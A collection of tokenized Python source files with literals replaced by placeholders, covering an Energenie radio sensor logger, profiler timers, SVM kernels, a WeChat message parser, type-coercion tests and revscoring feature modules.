<s> import time <EOL> from energenie import OpenThings <EOL> from energenie import Devices , Messages , radio <EOL> import os <EOL> LOG_FILENAME = "<STR_LIT>" <EOL> def warning ( msg ) : <EOL> print ( "<STR_LIT>" % str ( msg ) ) <EOL> def trace ( msg ) : <EOL> print ( "<STR_LIT>" % str ( msg ) ) <EOL> log_file = None <EOL> def logMessage ( msg ) : <EOL> HEADINGS = '<STR_LIT>' <EOL> global log_file <EOL> if log_file == None : <EOL> if not os . path . isfile ( LOG_FILENAME ) : <EOL> log_file = open ( LOG_FILENAME , '<STR_LIT:w>' ) <EOL> log_file . write ( HEADINGS + '<STR_LIT:\n>' ) <EOL> else : <EOL> log_file = open ( LOG_FILENAME , '<STR_LIT:a>' ) <EOL> header = msg [ '<STR_LIT>' ] <EOL> timestamp = time . time ( ) <EOL> mfrid = header [ '<STR_LIT>' ] <EOL> productid = header [ '<STR_LIT>' ] <EOL> sensorid = header [ '<STR_LIT>' ] <EOL> flags = [ <NUM_LIT:0> for i in range ( <NUM_LIT:7> ) ] <EOL> switch = None <EOL> voltage = None <EOL> freq = None <EOL> reactive = None <EOL> real = None <EOL> apparent = None <EOL> current = None <EOL> for rec in msg [ '<STR_LIT>' ] : <EOL> paramid = rec [ '<STR_LIT>' ] <EOL> try : <EOL> value = rec [ '<STR_LIT:value>' ] <EOL> except : <EOL> value = None <EOL> if paramid == OpenThings . PARAM_SWITCH_STATE : <EOL> switch = value <EOL> flags [ <NUM_LIT:0> ] = <NUM_LIT:1> <EOL> elif paramid == OpenThings . PARAM_VOLTAGE : <EOL> flags [ <NUM_LIT:1> ] = <NUM_LIT:1> <EOL> voltage = value <EOL> elif paramid == OpenThings . PARAM_FREQUENCY : <EOL> flags [ <NUM_LIT:2> ] = <NUM_LIT:1> <EOL> freq = value <EOL> elif paramid == OpenThings . PARAM_REACTIVE_POWER : <EOL> flags [ <NUM_LIT:3> ] = <NUM_LIT:1> <EOL> reactive = value <EOL> elif paramid == OpenThings . PARAM_REAL_POWER : <EOL> flags [ <NUM_LIT:4> ] = <NUM_LIT:1> <EOL> real = value <EOL> elif paramid == OpenThings . PARAM_APPARENT_POWER : <EOL> flags [ <NUM_LIT:5> ] = <NUM_LIT:1> <EOL> apparent = value <EOL> elif paramid == OpenThings . 
PARAM_CURRENT : <EOL> flags [ <NUM_LIT:6> ] = <NUM_LIT:1> <EOL> current = value <EOL> flags = "<STR_LIT>" . join ( [ str ( a ) for a in flags ] ) <EOL> csv = "<STR_LIT>" % ( timestamp , mfrid , productid , sensorid , flags , switch , voltage , freq , reactive , real , apparent , current ) <EOL> log_file . write ( csv + '<STR_LIT:\n>' ) <EOL> log_file . flush ( ) <EOL> trace ( csv ) <EOL> directory = { } <EOL> def allkeys ( d ) : <EOL> result = "<STR_LIT>" <EOL> for k in d : <EOL> if len ( result ) != <NUM_LIT:0> : <EOL> result += '<STR_LIT:U+002C>' <EOL> result += str ( k ) <EOL> return result <EOL> def updateDirectory ( message ) : <EOL> """<STR_LIT>""" <EOL> now = time . time ( ) <EOL> header = message [ "<STR_LIT>" ] <EOL> sensorId = header [ "<STR_LIT>" ] <EOL> if not directory . has_key ( sensorId ) : <EOL> desc = Devices . getDescription ( header [ "<STR_LIT>" ] , header [ "<STR_LIT>" ] ) <EOL> print ( "<STR_LIT>" % ( hex ( sensorId ) , desc ) ) <EOL> directory [ sensorId ] = { "<STR_LIT>" : message [ "<STR_LIT>" ] } <EOL> directory [ sensorId ] [ "<STR_LIT:time>" ] = now <EOL> def send_join_ack ( mfrid , productid , sensorid ) : <EOL> response = OpenThings . alterMessage ( Messages . JOIN_ACK , <EOL> header_mfrid = mfrid , <EOL> header_productid = productid , <EOL> header_sensorid = sensorid ) <EOL> p = OpenThings . encode ( response ) <EOL> radio . transmitter ( ) <EOL> radio . transmit ( p ) <EOL> radio . receiver ( ) <EOL> def monitor_loop ( ) : <EOL> """<STR_LIT>""" <EOL> radio . receiver ( ) <EOL> while True : <EOL> if radio . isReceiveWaiting ( ) : <EOL> payload = radio . receive ( ) <EOL> try : <EOL> decoded = OpenThings . decode ( payload ) <EOL> except OpenThings . OpenThingsException as e : <EOL> warning ( "<STR_LIT>" + str ( e ) ) <EOL> continue <EOL> OpenThings . 
showMessage ( decoded ) <EOL> updateDirectory ( decoded ) <EOL> logMessage ( decoded ) <EOL> if len ( decoded [ "<STR_LIT>" ] ) == <NUM_LIT:0> : <EOL> print ( "<STR_LIT>" % decoded ) <EOL> else : <EOL> if decoded [ "<STR_LIT>" ] [ <NUM_LIT:0> ] [ "<STR_LIT>" ] == OpenThings . PARAM_JOIN : <EOL> header = decoded [ "<STR_LIT>" ] <EOL> mfrid = header [ "<STR_LIT>" ] <EOL> productid = header [ "<STR_LIT>" ] <EOL> sensorid = header [ "<STR_LIT>" ] <EOL> send_join_ack ( mfrid , productid , sensorid ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> trace ( "<STR_LIT>" ) <EOL> radio . init ( ) <EOL> OpenThings . init ( Devices . CRYPT_PID ) <EOL> try : <EOL> monitor_loop ( ) <EOL> finally : <EOL> radio . finished ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> import sys <EOL> import time <EOL> from . . utils import lazy_import , Runnable <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class Timer ( Runnable ) : <EOL> """<STR_LIT>""" <EOL> clock = time . clock <EOL> def __call__ ( self ) : <EOL> return self . clock ( ) <EOL> def run ( self , profiler ) : <EOL> yield <EOL> class ContextualTimer ( Timer ) : <EOL> def __new__ ( cls , * args , ** kwargs ) : <EOL> timer = super ( ContextualTimer , cls ) . __new__ ( cls , * args , ** kwargs ) <EOL> timer . _contextual_times = { } <EOL> return timer <EOL> def __call__ ( self , context = None ) : <EOL> if context is None : <EOL> context = self . detect_context ( ) <EOL> paused_at , resumed_at = self . _contextual_times . get ( context , ( <NUM_LIT:0> , <NUM_LIT:0> ) ) <EOL> if resumed_at is None : <EOL> return paused_at <EOL> return paused_at + self . clock ( ) - resumed_at <EOL> def pause ( self , context = None ) : <EOL> if context is None : <EOL> context = self . detect_context ( ) <EOL> self . _contextual_times [ context ] = ( self ( context ) , None ) <EOL> def resume ( self , context = None ) : <EOL> if context is None : <EOL> context = self . detect_context ( ) <EOL> paused_at , __ = self . _contextual_times . get ( context , ( <NUM_LIT:0> , <NUM_LIT:0> ) ) <EOL> self . _contextual_times [ context ] = ( paused_at , self . clock ( ) ) <EOL> def detect_context ( self ) : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> class ThreadTimer ( Timer ) : <EOL> """<STR_LIT>""" <EOL> if sys . version_info < ( <NUM_LIT:3> , <NUM_LIT:3> ) : <EOL> yappi = lazy_import ( '<STR_LIT>' ) <EOL> def __call__ ( self ) : <EOL> return self . yappi . get_clock_time ( ) <EOL> else : <EOL> def __call__ ( self ) : <EOL> return time . clock_gettime ( time . 
CLOCK_THREAD_CPUTIME_ID ) <EOL> class GreenletTimer ( ContextualTimer ) : <EOL> """<STR_LIT>""" <EOL> greenlet = lazy_import ( '<STR_LIT>' ) <EOL> def detect_context ( self ) : <EOL> if self . greenlet : <EOL> return id ( self . greenlet . getcurrent ( ) ) <EOL> def _trace ( self , event , args ) : <EOL> origin , target = args <EOL> self . pause ( id ( origin ) ) <EOL> self . resume ( id ( target ) ) <EOL> def run ( self , profiler ) : <EOL> self . greenlet . settrace ( self . _trace ) <EOL> yield <EOL> self . greenlet . settrace ( None ) </s>
<s> '''<STR_LIT>''' <EOL> import numpy as np <EOL> class Linear ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' <EOL> def calc ( self , v1 , v2 ) : <EOL> if v2 == None : v2 = v1 <EOL> return np . dot ( v1 . T , v2 ) <EOL> class Polynomial ( object ) : <EOL> '''<STR_LIT>''' <EOL> __degree = <NUM_LIT:0> <EOL> def __init__ ( self , deg = <NUM_LIT:2> ) : <EOL> self . __degree = deg <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' . format ( degree = self . __degree ) <EOL> def calc ( self , v1 , v2 = None ) : <EOL> if v2 == None : v2 = v1 <EOL> return np . power ( np . dot ( v1 . T , v2 ) , self . __degree ) <EOL> class RBF ( object ) : <EOL> '''<STR_LIT>''' <EOL> __gamma = <NUM_LIT:0> <EOL> def __init__ ( self , gamma = <NUM_LIT:1> ) : <EOL> self . __gamma = gamma <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' . format ( gamma = self . __gamma ) <EOL> def calc ( self , v1 , v2 = None ) : <EOL> if v2 == None : v2 = v1 <EOL> l2 = np . linalg . norm ( v1 - v2 ) <EOL> return np . exp ( - self . __gamma * l2 ** <NUM_LIT:2> ) </s>
<s> import urllib2 <EOL> import ujson <EOL> from catsup . logger import logger <EOL> def search_github ( name ) : <EOL> repo_name = "<STR_LIT>" . format ( name = name ) <EOL> url = "<STR_LIT>" + repo_name <EOL> request = urllib2 . Request ( url ) <EOL> request . add_header ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> try : <EOL> response = urllib2 . urlopen ( request ) <EOL> except urllib2 . HTTPError as e : <EOL> logger . warning ( "<STR_LIT>" . format ( e . msg ) ) <EOL> return None <EOL> content = response . read ( ) <EOL> json = ujson . loads ( content ) <EOL> if json [ "<STR_LIT>" ] == <NUM_LIT:0> : <EOL> return None <EOL> for item in json [ "<STR_LIT>" ] : <EOL> if item [ "<STR_LIT:name>" ] == repo_name : <EOL> return { <EOL> "<STR_LIT:name>" : item [ "<STR_LIT:name>" ] , <EOL> "<STR_LIT>" : item [ "<STR_LIT>" ] <EOL> } </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> import xmltodict <EOL> from werobot . messages import MESSAGE_TYPES , UnknownMessage <EOL> def parse_user_msg ( xml ) : <EOL> return process_message ( parse_xml ( xml ) ) <EOL> def parse_xml ( text ) : <EOL> xml_dict = xmltodict . parse ( text ) [ "<STR_LIT>" ] <EOL> xml_dict [ "<STR_LIT>" ] = text <EOL> return xml_dict <EOL> def process_message ( message ) : <EOL> """<STR_LIT>""" <EOL> message [ "<STR_LIT:type>" ] = message . pop ( "<STR_LIT>" ) . lower ( ) <EOL> message_type = MESSAGE_TYPES . get ( message [ "<STR_LIT:type>" ] , UnknownMessage ) <EOL> return message_type ( message ) </s>
<s> from setuptools import setup , find_packages <EOL> from setuptools . command . test import test as TestCommand <EOL> import sys <EOL> version = '<STR_LIT>' <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> ] <EOL> tests_require = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> class PyTest ( TestCommand ) : <EOL> def finalize_options ( self ) : <EOL> TestCommand . finalize_options ( self ) <EOL> self . test_args = [ '<STR_LIT>' ] <EOL> self . test_suite = True <EOL> def run_tests ( self ) : <EOL> import pytest <EOL> errno = pytest . main ( self . test_args ) <EOL> sys . exit ( errno ) <EOL> setup ( name = '<STR_LIT>' , <EOL> version = version , <EOL> description = '<STR_LIT>' , <EOL> long_description = open ( '<STR_LIT>' ) . read ( ) + '<STR_LIT:\n>' + <EOL> open ( '<STR_LIT>' ) . read ( ) , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> keywords = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> packages = find_packages ( '<STR_LIT:src>' ) , <EOL> package_dir = { '<STR_LIT>' : '<STR_LIT:src>' } , <EOL> include_package_data = True , <EOL> zip_safe = True , <EOL> install_requires = install_requires , <EOL> tests_require = tests_require , <EOL> extras_require = { '<STR_LIT>' : tests_require } , <EOL> cmdclass = { '<STR_LIT:test>' : PyTest } , <EOL> ) </s>
<s> from functools import wraps <EOL> from . context import Context <EOL> from . process import Process <EOL> _ROOT_CONTEXT = None <EOL> def initialize ( delegate = "<STR_LIT>" , ** kw ) : <EOL> global _ROOT_CONTEXT <EOL> _ROOT_CONTEXT = Context . singleton ( delegate = delegate , ** kw ) <EOL> if not _ROOT_CONTEXT . is_alive ( ) : <EOL> _ROOT_CONTEXT . start ( ) <EOL> def join ( ) : <EOL> """<STR_LIT>""" <EOL> _ROOT_CONTEXT . join ( ) <EOL> def after_init ( fn ) : <EOL> @ wraps ( fn ) <EOL> def wrapper_fn ( * args , ** kw ) : <EOL> initialize ( ) <EOL> return fn ( * args , ** kw ) <EOL> return wrapper_fn <EOL> @ after_init <EOL> def spawn ( process ) : <EOL> """<STR_LIT>""" <EOL> return _ROOT_CONTEXT . spawn ( process ) <EOL> route = Process . route <EOL> install = Process . install <EOL> __all__ = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> del after_init </s>
<s> import pytest <EOL> from pystachio . basic import Boolean , Enum , Float , Integer , SimpleObject , String <EOL> def unicodey ( s ) : <EOL> from sys import version_info <EOL> if version_info [ <NUM_LIT:0> ] == <NUM_LIT:2> : <EOL> return unicode ( s ) <EOL> else : <EOL> return s <EOL> def test_bad_inputs ( ) : <EOL> for typ in Float , Integer , String , Boolean : <EOL> with pytest . raises ( TypeError ) : <EOL> typ ( ) <EOL> with pytest . raises ( TypeError ) : <EOL> typ ( "<STR_LIT:1>" , "<STR_LIT:2>" ) <EOL> with pytest . raises ( TypeError ) : <EOL> typ ( foo = '<STR_LIT>' ) <EOL> bad_inputs = [ { <NUM_LIT:1> : <NUM_LIT:2> } , None , type , Float , Integer , String , Boolean , <EOL> Float ( <NUM_LIT:1> ) , Integer ( <NUM_LIT:1> ) , String ( <NUM_LIT:1> ) , Boolean ( <NUM_LIT:1> ) ] <EOL> for inp in bad_inputs : <EOL> with pytest . raises ( SimpleObject . CoercionError ) : <EOL> '<STR_LIT:%s>' % typ ( inp ) <EOL> def test_string_constructors ( ) : <EOL> good_inputs = [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , unicodey ( '<STR_LIT>' ) , <EOL> <NUM_LIT:1.0> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT> <EOL> ] <EOL> for input in good_inputs : <EOL> str ( String ( input ) ) <EOL> repr ( String ( input ) ) <EOL> def test_float_constructors ( ) : <EOL> bad_inputs = [ '<STR_LIT>' , '<STR_LIT>' , unicodey ( '<STR_LIT>' ) , unicodey ( '<STR_LIT>' ) ] <EOL> good_inputs = [ unicodey ( '<STR_LIT>' ) , '<STR_LIT>' , '<STR_LIT>' , unicodey ( '<STR_LIT>' ) , '<STR_LIT>' , <NUM_LIT:0> , <NUM_LIT:0.0> , <NUM_LIT> ] <EOL> for input in bad_inputs : <EOL> with pytest . raises ( SimpleObject . CoercionError ) : <EOL> str ( Float ( input ) ) <EOL> with pytest . raises ( SimpleObject . 
CoercionError ) : <EOL> repr ( Float ( input ) ) <EOL> for input in good_inputs : <EOL> str ( Float ( input ) ) <EOL> repr ( Float ( input ) ) <EOL> assert Float ( unicodey ( '<STR_LIT>' ) ) % { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : '<STR_LIT>' } == Float ( <NUM_LIT> ) <EOL> assert Float ( <NUM_LIT> ) . check ( ) . ok ( ) <EOL> assert Float ( '<STR_LIT>' ) . check ( ) . ok ( ) <EOL> assert not Float ( '<STR_LIT>' ) . check ( ) . ok ( ) <EOL> def test_integer_constructors ( ) : <EOL> bad_inputs = [ '<STR_LIT>' , '<STR_LIT>' , unicodey ( '<STR_LIT>' ) , unicodey ( '<STR_LIT>' ) , '<STR_LIT>' ] <EOL> good_inputs = [ unicodey ( '<STR_LIT>' ) , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:0> , <NUM_LIT:0.0> , <NUM_LIT> ] <EOL> for input in bad_inputs : <EOL> with pytest . raises ( SimpleObject . CoercionError ) : <EOL> str ( Integer ( input ) ) <EOL> with pytest . raises ( SimpleObject . CoercionError ) : <EOL> repr ( Integer ( input ) ) <EOL> for input in good_inputs : <EOL> str ( Integer ( input ) ) <EOL> repr ( Integer ( input ) ) <EOL> assert Integer ( <NUM_LIT> ) . check ( ) . ok ( ) <EOL> assert Integer ( '<STR_LIT>' ) . check ( ) . ok ( ) <EOL> assert not Integer ( '<STR_LIT>' ) . check ( ) . ok ( ) <EOL> def test_boolean_constructors ( ) : <EOL> bad_inputs = [ '<STR_LIT>' , '<STR_LIT>' , unicodey ( '<STR_LIT>' ) , unicodey ( '<STR_LIT>' ) , '<STR_LIT>' , '<STR_LIT>' ] <EOL> good_inputs = [ unicodey ( '<STR_LIT>' ) , - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , '<STR_LIT:true>' , '<STR_LIT:false>' , '<STR_LIT:0>' , '<STR_LIT:1>' , True , False ] <EOL> for input in bad_inputs : <EOL> with pytest . raises ( SimpleObject . CoercionError ) : <EOL> str ( Boolean ( input ) ) <EOL> with pytest . raises ( SimpleObject . 
CoercionError ) : <EOL> repr ( Boolean ( input ) ) <EOL> for input in good_inputs : <EOL> str ( Boolean ( input ) ) <EOL> repr ( Boolean ( input ) ) <EOL> assert Boolean ( <NUM_LIT:0> ) == Boolean ( False ) <EOL> assert Boolean ( <NUM_LIT:0> ) != Boolean ( True ) <EOL> assert Boolean ( <NUM_LIT:1> ) == Boolean ( True ) <EOL> assert Boolean ( <NUM_LIT:1> ) != Boolean ( False ) <EOL> assert Boolean ( "<STR_LIT:0>" ) == Boolean ( False ) <EOL> assert Boolean ( "<STR_LIT:1>" ) == Boolean ( True ) <EOL> assert not Boolean ( "<STR_LIT:2>" ) . check ( ) . ok ( ) <EOL> assert Boolean ( <NUM_LIT> ) . check ( ) . ok ( ) <EOL> assert Boolean ( '<STR_LIT:true>' ) . check ( ) . ok ( ) <EOL> assert Boolean ( '<STR_LIT:false>' ) . check ( ) . ok ( ) <EOL> assert Boolean ( True ) . check ( ) . ok ( ) <EOL> assert Boolean ( False ) . check ( ) . ok ( ) <EOL> assert not Boolean ( '<STR_LIT>' ) . check ( ) . ok ( ) <EOL> assert Boolean ( '<STR_LIT>' ) . bind ( foo = True ) . check ( ) . ok ( ) <EOL> def test_cmp ( ) : <EOL> assert not Float ( <NUM_LIT:1> ) == Integer ( <NUM_LIT:1> ) <EOL> assert Float ( <NUM_LIT:1> ) != Integer ( <NUM_LIT:1> ) <EOL> assert not String ( <NUM_LIT:1> ) == Integer ( <NUM_LIT:1> ) <EOL> assert Integer ( <NUM_LIT:1> ) < Integer ( <NUM_LIT:2> ) <EOL> assert Integer ( <NUM_LIT:2> ) > Integer ( <NUM_LIT:1> ) <EOL> assert Integer ( <NUM_LIT:1> ) == Integer ( <NUM_LIT:1> ) <EOL> assert String ( "<STR_LIT:a>" ) < String ( "<STR_LIT:b>" ) <EOL> assert String ( "<STR_LIT:a>" ) == String ( "<STR_LIT:a>" ) <EOL> assert String ( "<STR_LIT:b>" ) > String ( "<STR_LIT:a>" ) <EOL> assert Float ( <NUM_LIT:1> ) < Float ( <NUM_LIT:2> ) <EOL> assert Float ( <NUM_LIT:2> ) > Float ( <NUM_LIT:1> ) <EOL> assert Float ( <NUM_LIT:1> ) == Float ( <NUM_LIT:1> ) <EOL> assert Float ( <NUM_LIT> ) > Float ( <NUM_LIT:1> ) <EOL> for typ1 in ( Float , String , Integer ) : <EOL> for typ2 in ( Float , String , Integer ) : <EOL> if typ1 != typ2 : <EOL> assert typ1 ( <NUM_LIT:1> ) < typ2 ( 
<NUM_LIT:1> ) <EOL> assert typ1 ( <NUM_LIT:1> ) <= typ2 ( <NUM_LIT:1> ) <EOL> assert not typ1 ( <NUM_LIT:1> ) > typ2 ( <NUM_LIT:1> ) <EOL> assert not typ1 ( <NUM_LIT:1> ) >= typ2 ( <NUM_LIT:1> ) <EOL> def test_hash ( ) : <EOL> map = { <EOL> Integer ( <NUM_LIT:1> ) : '<STR_LIT:foo>' , <EOL> String ( "<STR_LIT:bar>" ) : '<STR_LIT>' , <EOL> Float ( '<STR_LIT>' ) : '<STR_LIT>' , <EOL> Boolean ( '<STR_LIT:true>' ) : '<STR_LIT>' <EOL> } <EOL> assert Integer ( <NUM_LIT:1> ) in map <EOL> assert String ( "<STR_LIT:bar>" ) in map <EOL> assert Float ( '<STR_LIT>' ) in map <EOL> assert Float ( '<STR_LIT>' ) not in map <EOL> assert Integer ( <NUM_LIT:2> ) not in map <EOL> assert String ( "<STR_LIT>" ) not in map <EOL> assert Boolean ( '<STR_LIT:false>' ) not in map <EOL> assert Boolean ( '<STR_LIT:true>' ) in map <EOL> def test_N_part_enum_constructors ( ) : <EOL> EmptyEnum = Enum ( ) <EOL> EmptyEnum ( '<STR_LIT>' ) <EOL> with pytest . raises ( ValueError ) : <EOL> repr ( EmptyEnum ( '<STR_LIT>' ) ) <EOL> OneEnum = Enum ( '<STR_LIT>' ) <EOL> OneEnum ( '<STR_LIT>' ) <EOL> with pytest . raises ( ValueError ) : <EOL> OneEnum ( '<STR_LIT>' ) <EOL> TwoEnum = Enum ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> for value in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> TwoEnum ( value ) <EOL> for value in ( '<STR_LIT>' , <NUM_LIT:1> , None , '<STR_LIT>' ) : <EOL> with pytest . raises ( ValueError ) : <EOL> TwoEnum ( value ) <EOL> assert TwoEnum ( '<STR_LIT>' ) . check ( ) . ok ( ) <EOL> assert TwoEnum ( '<STR_LIT>' ) . check ( ) . ok ( ) <EOL> assert TwoEnum ( '<STR_LIT>' ) . bind ( anything = '<STR_LIT>' ) . check ( ) . ok ( ) <EOL> assert not TwoEnum ( '<STR_LIT>' ) . check ( ) . ok ( ) <EOL> assert not TwoEnum ( '<STR_LIT>' ) . bind ( anything = '<STR_LIT>' ) . check ( ) . 
ok ( ) <EOL> def test_two_part_enum_constructors ( ) : <EOL> Numbers = Enum ( '<STR_LIT>' , ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> Dogs = Enum ( '<STR_LIT>' , ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> assert not Dogs ( '<STR_LIT>' ) . check ( ) . ok ( ) <EOL> assert not Dogs ( '<STR_LIT>' ) . bind ( what = '<STR_LIT>' ) . check ( ) . ok ( ) <EOL> assert Dogs ( '<STR_LIT>' ) . bind ( what = '<STR_LIT>' ) . check ( ) . ok ( ) </s>
<s> from revscoring . languages import polish <EOL> from . import enwiki , mediawiki , wikipedia , wikitext <EOL> badwords = [ <EOL> polish . badwords . revision . diff . match_delta_sum , <EOL> polish . badwords . revision . diff . match_delta_increase , <EOL> polish . badwords . revision . diff . match_delta_decrease , <EOL> polish . badwords . revision . diff . match_prop_delta_sum , <EOL> polish . badwords . revision . diff . match_prop_delta_increase , <EOL> polish . badwords . revision . diff . match_prop_delta_decrease <EOL> ] <EOL> informals = [ <EOL> polish . informals . revision . diff . match_delta_sum , <EOL> polish . informals . revision . diff . match_delta_increase , <EOL> polish . informals . revision . diff . match_delta_decrease , <EOL> polish . informals . revision . diff . match_prop_delta_sum , <EOL> polish . informals . revision . diff . match_prop_delta_increase , <EOL> polish . informals . revision . diff . match_prop_delta_decrease <EOL> ] <EOL> dict_words = [ <EOL> polish . dictionary . revision . diff . dict_word_delta_sum , <EOL> polish . dictionary . revision . diff . dict_word_delta_increase , <EOL> polish . dictionary . revision . diff . dict_word_delta_decrease , <EOL> polish . dictionary . revision . diff . dict_word_prop_delta_sum , <EOL> polish . dictionary . revision . diff . dict_word_prop_delta_increase , <EOL> polish . dictionary . revision . diff . dict_word_prop_delta_decrease , <EOL> polish . dictionary . revision . diff . non_dict_word_delta_sum , <EOL> polish . dictionary . revision . diff . non_dict_word_delta_increase , <EOL> polish . dictionary . revision . diff . non_dict_word_delta_decrease , <EOL> polish . dictionary . revision . diff . non_dict_word_prop_delta_sum , <EOL> polish . dictionary . revision . diff . non_dict_word_prop_delta_increase , <EOL> polish . dictionary . revision . diff . non_dict_word_prop_delta_decrease <EOL> ] <EOL> damaging = wikipedia . page + wikitext . parent + wikitext . 
diff + mediawiki . user_rights + mediawiki . protected_user + mediawiki . comment + badwords + informals + dict_words + enwiki . badwords + enwiki . informals <EOL> reverted = damaging <EOL> goodfaith = damaging </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> from . . datasource import Datasource <EOL> class filter ( Datasource ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , include , items_datasource , inverse = False , name = None ) : <EOL> self . include = include <EOL> self . inverse = inverse <EOL> name = self . _format_name ( name , [ items_datasource ] ) <EOL> super ( ) . __init__ ( name , self . process , depends_on = [ items_datasource ] ) <EOL> def process ( self , items ) : <EOL> if not self . inverse : <EOL> return [ item for item in items if self . include ( item ) ] <EOL> else : <EOL> return [ item for item in items if not self . include ( item ) ] <EOL> class regex_matching ( filter ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , regex , strs_datasource , name = None ) : <EOL> if not hasattr ( regex , "<STR_LIT>" ) : <EOL> self . regex = re . compile ( regex , re . I ) <EOL> else : <EOL> self . regex = regex <EOL> super ( ) . __init__ ( self . regex . match , strs_datasource , name = name ) <EOL> class positive ( filter ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , numbers_datasource , name = None ) : <EOL> super ( ) . __init__ ( self . is_positive , numbers_datasource , name = name ) <EOL> def is_positive ( self , v ) : <EOL> return v > <NUM_LIT:0> <EOL> class negative ( filter ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , numbers_datasource , name = None ) : <EOL> super ( ) . __init__ ( self . is_negative , numbers_datasource , name = name ) <EOL> def is_negative ( self , v ) : <EOL> return v < <NUM_LIT:0> </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import yamlconf <EOL> from . . datasources import revision_oriented <EOL> from . . dependencies import Context <EOL> logger = logging . getLogger ( __name__ ) <EOL> class Extractor ( Context ) : <EOL> """<STR_LIT>""" <EOL> def extract ( self , rev_ids , dependents , context = None , caches = None , <EOL> cache = None , profile = None ) : <EOL> raise NotImplementedError ( ) <EOL> @ classmethod <EOL> def from_config ( cls , config , name , section_key = "<STR_LIT>" ) : <EOL> section = config [ section_key ] [ name ] <EOL> if '<STR_LIT>' in section : <EOL> return yamlconf . import_module ( section [ '<STR_LIT>' ] ) <EOL> elif '<STR_LIT:class>' in section : <EOL> Class = yamlconf . import_module ( section [ '<STR_LIT:class>' ] ) <EOL> return Class . from_config ( config , name ) <EOL> class OfflineExtractor ( Extractor ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> super ( ) . __init__ ( ) <EOL> logger . warning ( "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> def extract ( self , rev_ids , dependents , context = None , caches = None , <EOL> cache = None , profile = None ) : <EOL> caches = caches or { } <EOL> if hasattr ( rev_ids , "<STR_LIT>" ) : <EOL> return self . _extract_many ( rev_ids , dependents , context = context , <EOL> caches = caches , cache = cache , <EOL> profile = profile ) <EOL> else : <EOL> rev_id = rev_ids <EOL> cache = cache or caches <EOL> return self . _extract ( rev_id , dependents , context = context , <EOL> cache = cache , profile = profile ) <EOL> def _extract ( self , rev_id , dependents , context = None , cache = None , <EOL> profile = None ) : <EOL> solve_cache = { revision_oriented . revision . id : rev_id } <EOL> solve_cache . update ( cache or { } ) <EOL> return self . 
solve ( dependents , context = context , cache = solve_cache , <EOL> profile = profile ) <EOL> def _extract_many ( self , rev_ids , features , context = None , caches = None , <EOL> cache = None , profile = None ) : <EOL> for rev_id in rev_ids : <EOL> yield None , self . _extract ( rev_id , features , context = context , <EOL> cache = caches . get ( rev_id , cache ) , <EOL> profile = profile ) <EOL> @ classmethod <EOL> def from_config ( cls , config , name , section_key = "<STR_LIT>" ) : <EOL> return cls ( ) </s>
<s> from . revision_oriented import Revision <EOL> from . diff import Diff <EOL> __all__ = [ Revision , Diff ] </s>
<s> """<STR_LIT>""" <EOL> from . dictionary import Dictionary <EOL> from . regex_matches import RegexMatches <EOL> from . stemmed import Stemmed <EOL> from . stopwords import Stopwords <EOL> __all__ = [ Dictionary , RegexMatches , Stemmed , Stopwords ] </s>
